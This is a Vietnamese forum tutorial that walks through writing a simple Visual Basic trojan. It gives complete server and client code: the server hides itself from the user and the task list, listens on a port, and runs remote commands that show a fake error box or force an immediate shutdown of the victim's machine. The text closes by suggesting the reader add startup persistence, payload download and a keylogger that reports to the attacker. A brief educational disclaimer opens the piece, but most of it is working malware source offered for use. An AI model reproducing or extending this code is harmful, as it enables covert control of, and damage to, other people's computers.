Chung toi dang bai nay khong phai muc dich khuyen khich cac ban viet virus pha hoai du lieu nguoi dung ma chi muon qua bai viet nay cac ban co the hieu biet mot phan nao do ve cach xay dung mot virus. Qua day cac ban cung co the xay dung cac y tuong ve mot phan mem chong virus khi chung ta biet ro duong di cua mot virus mang.
Viet mot Trojan de dang hon nhieu so voi moi nguoi nghi. Tat ca thuc su chi can hai chuong trinh ung dung don gian voi noi dung it hon 100 dong ma lenh.Chuong trinh dau tien la client, la chuong trinh cho nguoi su dung biet. Chuong trinh thu hai la server, hay phan “trojan” thuc. Bay gio chung ta se xem chung ta can gi cho ca hai va mot so vi du mau. Server Server la phan Trojan cua chuong trinh. No can phai duoc giau de nguoi dung binh thuong khong the tim thay no.
De thuc hien dieu nay ban bat dau bang cach su dung doan ma lenh sau: Private Sub Form_Load()
Me.Visible = False
End Sub | Doan ma nay lam cho chuong trinh khong the thay duoc bang mat thuong nhung co the bi phat hien trong Task Manager cua Windows vi the neu muon chuong trinh an tot hon, chung ta co the viet doan ma nhu sau: Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
End Sub | (Trong he dieu hanh Windows, tat ca chuong trinh co duoi .exe deu duoc the hien trong danh sach chuong trinh chay. Tuy nhien chuong trinh cua ban se duoc an trong Running Applications List )
Bay gio chung ta da co mot chuong trinh tang hinh doi voi nguoi su dung binh thuong, ma chi can co bon dong lenh. Tuy nhien no van con qua don gian, chung ta co the lam cho no tot hon bang cach them vao mot so ham.
Dau tien la lam sao cho no co the “nghe” duoc cac ket noi khi no xam nhap duoc vao may, chung ta can them vao mot dieu khien Winsock Control.
Toi dat ten cho dieu khien cua toi la “win”. Con cac ban co the dat la bat cu cai gi tuy y.
De lam cho Trojan "nghe" duoc cong 2999 khi khoi dong, chung ta viet doan ma nhu sau: Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
win.LocalPort = 2999
win.RemotePort = 455
win.Listen
End Sub | Doan ma nay thiet lap mot cong mo cuc bo toi cong 2999, va cong ma no gui toi la 445.
Bay gio, chuong trinh da co the “nghe”, nhung chua lam duoc dieu gi ro rang ca.
Chung ta them doan ma sau vao form chinh: Private Sub win_ConnectionRequest(ByVal requestID As Long)
win.Close
win.Accept requestID
End Sub
Private Sub win_DataArrival(ByVal bytesTotal As Long)
win.GetData GotDat
DoActions (GotDat)
End Sub | Tiep theo, chung ta se viet ham DoActions nhu la mot chuong trinh con de goi vao main form. Doan ma tren thuc hien hai nhiem vu: Dau tien la lam cho tat ca cac yeu cau ket noi duoc tu dong chap nhan; tiep do la lam cho tat ca cac du lieu duoc tu dong chap nhan va sau do thi chuyen toan bo du lieu nay sang cho ham DoActions ma chung ta se viet duoi day.
Ham DoActions nen viet o dang public de cac chuong trinh o ngoai modul cung co the dung duoc. Them doan ma sau vao modul, va chung ta dang lam viec voi server cua Trojan: Public Function DoActions(x As String)
Select Case x
Case "msgbox"
Msgbox "The file C:\windows\getboobies.exe has caused an error and will be terminated",vbCritical,"Critical Error"
Case "shutdown"
shell "shutdown -s -f -t 00"
End Select
End Function | Bay gio ban da co mot chuong trinh ma khi du lieu “Msgbox” duoc gui toi cong 2999, no se the hien mot hop tin nhan msgbox tren may tinh cua nan nhan. Khi du lieu “shutdown” duoc gui toi cong 2999, no se tat may tinh cua nan nhan. Toi dung cau lenh “Select Case” de de dang chinh sua doan ma ve sau nay. Xin chuc mung, ban vua moi viet xong Trojan dau tien cua ban. Bay gio chung ta hay xem lai doan ma hoan chinh.
Main Form Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
win.LocalPort = 2999
win.RemotePort = 455
win.Listen
End Sub
Pivate Sub win_ConnectionRequest(ByVal requestID As Long)
win.Close
win.Accept requestID
End Sub
Private Sub win_DataArrival(ByVal bytesTotal As Long)
win.GetData GotDat
DoActions (GotDat)
End Sub | Hay nho them dieu khien winsock va dat ten no la “win” neu ban dung doan ma nay:
Module Public Function DoActions(x As String)
Select Case x
Case "msgbox"
Msgbox "The file C:\windows\getboobies.exe has caused an error and will be terminated",vbCritical,"Critical Error"
Case "shutdown"
shell "shutdown -s -f -t 00"
End Select
End Function | Tat ca phan Server cua Trojan chi co the. Gio chung ta xem xet den phan Client Client Client la cai ma ban se tuong tac toi. Ban se dung no de ket noi toi server tu xa (trojan) va gui cho no cac lenh. Sau khi da viet duoc phan server chap nhan cau lenh “shutdown”, “msgbox”, chung ta hay tao ra mot client gui di cac cau lenh do.
Tao mot form them mot dieu khien Winsock Control, mot hop text box va bon nut. Trong doan ma duoi hop text box duoc dat ten la txtIP, cac nut duoc dat ten la cmdConnect, cmdMsgbox, cmdShutdown va cmdDisconnect. Doan ma nhu sau: Private Sub cmdConnect_Click()
IpAddy = txtIp.Text
Win.Close
Win.RemotePort = 2999
Win.RemoteHost = IpAddy
Win.LocalPort = 9999
Win.Connect
cmdConnect.Enabled = False
End Sub
Private Sub cmdDisconnect_Click()
Win.Close
cmdConnect.Enabled = True
End Sub
Private Sub cmdMsgbox_Click()
Win.SendData "msgbox"
End Sub
Private Sub cmdShutdown_Click()
Win.SendData "shutdown"
End Sub | Do la doan ma cho client. Tat ca viec no lam la lay dia chi IP tu txtIP va ket noi voi cong tu xa 2999. Sau khi duoc ket noi, ban co the gui du lieu “shutdown” hay “msgbox” toi server va cac hoat dong tuong ung se duoc thuc hien (tat may tinh hay the hien mot hop tin nhan).
Hai chuong trinh nay lam duoc rat it nhung co the cai tien nhanh chong thanh mot chuc nang quan tri tu xa manh neu ban biet ban dang lam gi. Toi de nghi la nen co gang them cac loai dieu khien loi va ham cho ca client va server. Loi khuyen Hay lam cho server co the tai duoc mot file dac ta cua nguoi tan cong.
Them ma lenh de Server duoc thuc thi luc khoi dong (la mot khoa thanh ghi).
Va mot keylogger cho server – lam cho no gui thong tin cho nguoi tan cong.
Co rat nhieu cach ban co the lam, chi can dung tri tuong tuong cua ban By T.Thu Article source http://w4rum.com/20.t
| 